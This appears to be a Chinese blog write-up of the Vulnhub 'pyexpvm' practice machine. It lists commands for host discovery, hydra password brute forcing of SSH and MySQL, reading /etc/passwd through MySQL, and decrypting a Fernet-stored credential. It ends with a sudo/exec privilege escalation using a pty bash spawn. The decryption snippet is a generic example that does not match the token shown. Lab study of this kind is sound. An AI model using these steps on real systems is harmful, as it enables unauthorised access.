声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/pyexp/pyexpvm.zip
内容简介:
在这次打靶过程中,将使用到以下攻击手段:
主机发现
SSH密码爆破
MySQL密码爆破
MySQL执行代码
编写解密代码
SUDO权限漏洞
Python函数
本地提权
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap -p- 192.168.112.129
nmap -p1337,3306 -sC -sV 192.168.112.129
存在mysql端口
1.3 SSH密码爆破
准备密码字段
cp /usr/share/wordlists/rockyou.txt.gz .
解压密码字典
gunzip rockyou.txt.gz
使用hydra爆破ssh
hydra -l root -P rockyou.txt ssh://192.168.112.129:1337/
但是并没有爆破成功
1.4 MYSQL密码爆破
hydra -l root -P rockyou.txt mysql://192.168.112.129
爆破成功
账号 root 密码 prettywoman
登录mysql
mysql -u root -h 192.168.112.129 -p
1.5 MYSQL执行代码
select load_file("/etc/passwd");
show database;
use data;
select * from fernet;
1.6 编写解密代码
利用 fernet编写python解密
cred |
keyy |
gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= |
UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= |
参照
https://cryptography.io/en/latest/fernet/
使用python3导入
from cryptography.fernet import Fernet
key = Fernet.generate_key()
f = Fernet(key)
token = f.encrypt(b"my deep dark secret")
token
b'...'
f.decrypt(token)
b'my deep dark secret
解密成功
lucy:wJ9`"Lemdv9[FEw-
1.7 SUDO权限漏洞
ssh lucy@192.168.112.129 -p 1337 //成功登录
sudo -l
cat /opt/exp.py
分析exec作用
1.8 Python函数(本地提权)
python2提权脚本代码
import pty;pty.spawn("/bin/bash")
成功
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
1、公众号后台回复:搜索大法,获取searchall工具下载链接。
2、公众号后台回复:靶场,获取靶场工具网盘下载链接。
3、公众号后台回复:webshell,获取webshell下载链接。
3、公众号后台回复:验证码,获取验证码工具下载链接。
原文始发于微信公众号(嗨嗨安全):靶机实战系列之pyexpvm靶机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论